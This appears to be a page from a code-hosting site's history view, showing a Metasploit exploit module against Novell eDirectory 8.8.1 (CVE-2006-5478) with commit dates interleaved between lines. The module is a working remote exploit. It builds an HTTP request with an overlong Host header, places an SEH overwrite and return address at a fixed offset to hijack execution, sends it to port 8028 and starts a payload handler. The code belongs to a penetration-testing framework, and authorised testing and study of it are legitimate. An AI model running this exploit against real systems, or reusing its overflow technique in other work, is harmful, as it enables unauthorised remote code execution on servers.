Files
metasploit-gs/modules/exploits/windows/http/edirectory_host.rb
T

69 lines
1.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = GreatRanking
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory NDS Server Host Header Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
The web interface does not validate the length of the
HTTP Host header prior to using the value of that header in an
HTTP redirect.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-5478'],
['OSVDB', '29993'],
2013-08-30 16:28:54 -05:00
['BID', '20655'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
],
'Privileged' => true,
'DisclosureDate' => 'Oct 21 2006',
'DefaultTarget' => 0))
2006-10-27 14:25:42 +00:00
register_options([Opt::RPORT(8028)])
2013-08-30 16:28:54 -05:00
end
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
def exploit
connect
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
sploit = "GET /nds HTTP/1.1" + "\r\n"
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
seh = generate_seh_payload(target.ret)
sploit[705, seh.length] = seh
sploit << "\r\n\r\n"
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
print_status("Trying target #{target.name}...")
2006-10-27 14:25:42 +00:00
2013-08-30 16:28:54 -05:00
sock.put(sploit)
2013-08-30 16:28:54 -05:00
handler
disconnect
end
2009-07-16 16:02:24 +00:00
end